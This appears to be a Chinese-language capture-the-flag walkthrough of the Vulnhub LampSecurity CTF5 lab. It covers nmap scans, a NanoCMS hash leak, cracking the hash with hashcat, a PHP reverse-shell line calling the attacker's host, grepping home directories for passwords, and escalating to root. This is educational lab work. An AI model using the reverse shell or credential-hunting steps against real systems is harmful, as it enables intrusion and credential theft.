Vulnhub靶机实操笔记-LampSecurity-CTF5

一、Namp扫描

1、主机存活判断

sudo nmap -sn 192.168.32.0/24 

image.png

2、快速扫描

以不低于1w的速度快速扫描端口

sudo nmap --min-rate 10000 -p- 192.168.32.142 -oA report/min-rate 

--min-rate          #以不低于xxx的速度扫描
-p-                 #全端口
-oA                 #将扫描结果输出保存到某个文件夹下某个文件 例子是放在report目录下叫min-rate文件

image.png
使用TCP和UDP的形式对扫出的端口进行协议的查看

3、TCP扫描

sudo nmap -sT -sV -O -p22,25,80,110,111,139,143,445,901,3306,52385 192.168.32.142

-sT               #以TCP协议进行扫描
-sV               #服务的版本号
-O                #服务器系统
-p                #指定端口

image.png

4、UDP扫描

sudo nmap -sU -p22,25,80,110,111,139,143,445,901,3306,52385 192.168.32.142

-sU           #以UDP协议扫描
-p            #指定端口
-oA           #将扫描结果输出保存到某个文件夹下某个文件 例子是放在report目录下叫heavy-U文件

image.png

5、Namp的POC扫描

有挺多结果的,可以明显看到通过namp脚本检测我们这个网站存在有SQL注入漏洞的

sudo nmap --script=vuln -p22,25,80,110,111,139,143,445,901,3306,52385 192.168.32.142

image.png

二、NanoCMS

访问80端口,系统是一个NanoCMS
image.png
查CMS是否存在相关漏洞,有一个RCE漏洞但需要账户密码认证

searchsploit nanocms

image.png

1、信息泄露

Google搜索nanocms的exp,搜索到有一个信息泄露,尝试访问查看细节。
image.png
看到cms访问这个文件路径会泄露密码的hash值
image.png
利用漏洞获得账户为admin,与一个密码hash值
http://192.168.32.142/~andy/data/pagesdata.txt
image.png

2、hash-identifier判断加密方式

判断密文的加密形式,提示最有可能是md5加密

hash-identifier '9d2f75377ac0ab991d40c91fd27e52fd'     #判断密文的加密形式

image.png

3、Hashcat破解密码

这边使用hashcat去破解,获得密码shannon

Hashcat 常用选顶参数

-a                                #指定破解模式
-m                                #指定Hash类型( 默认MD5 )
-o                                #将输出结果储存到指定的文件
--force                           #忽略警告信息
--show                            #仅显示已经破解的Hash及其对应的明文(近期破解的存放在hashcat.potfile文件中)
--incremen                        #启用增量破解模式, 可以利用此模式让Hashcat     
--increment-min                   #在指定的密码长度范围内执行破解过程


Hashcat 的破解模式( 用 -a 选顶指定)

-a  0         										#Straight ( 字典破解)
-a  1         										#Combination ( 组合破解)
-a  3         										#Brute-force ( 掩码暴力破解)
-a  6         										#Hybrid Wordlist + Mask ( 字典+掩码破解)
-a  7         										#Hybrid Mask + WordIist ( 掩码+字典破解)


Hashcat 的Hash 类型( 用 -m 选项指定)
-m 900                           MD4
-m 0                       			 MD5
-m 100                           SHAI
-m 1300             		         SHA2-224
-m 1400              		         SHA2-256
-m 10800             		         SHA2-384
-m 1700              		         SHA2-512
-m 10                 	         MD5($pass.$salt)
-m 20                 	         MD5($salt.$pass)
-m 3800              		         MD5($saIt.$pass.$salt)
-m 3000               	         LM
-m 1000               	         N
sudo hashcat -m 0 -a 0 9d2f75377ac0ab991d40c91fd27e52fd    /usr/share/wordlists/rockyou.txt

-m                                #指定Hash类型( 默认MD5 )
-a  0         										#Straight ( 字典破解)

image.png
image.png
image.png
尝试获得的账户密码登陆系统
http://192.168.32.142/~andy/data/nanoadmin.php
image.png
image.png
成功登陆系统
image.png

4、拿下内网主机

直接改原有的php页面内容
image.png

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.32.131/1234 0>&1'");?>

image.png
访问点击修改的页面获得shell
image.png
获得shell
image.png

三、内网提权

1、查看系统详情

uname -a

image.png

2、查看用户权限

sudo -l

image.png

3、查看系统用户信息

可以看到当前系统用户比较多,尝试找历史记录,从历史记录中招敏感信息

cat /etc/passwd

image.png
image.png

5、用户历史记录查找敏感信息pass

从用户的历史记录查找敏感信息pass

grep -R -i pass /home/* 2>/dev/null    #在/home路径下查找pass信息并将报错信息丢掉

image.png

看到有个Root password,尝试去看下这个文件的具体内容 /home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note
image.png
找到root密码是 50$cent
image.png

6、成功获得root权限

一开始直接尝试切换用户发现提示错误,经过一番尝试还得先进行一个pty让其交互提升,再进行用户切换切换到root用户

python -c "import pty;pty.spawn('/bin/sh')"
su -

image.png

四、靶场资源获取

关注公众号,回复关键词 LampSecurity-CTF5,获取学习资源
image

posted @ 2023-07-02 10:57  沈少呀  阅读(153)  评论(0)    收藏  举报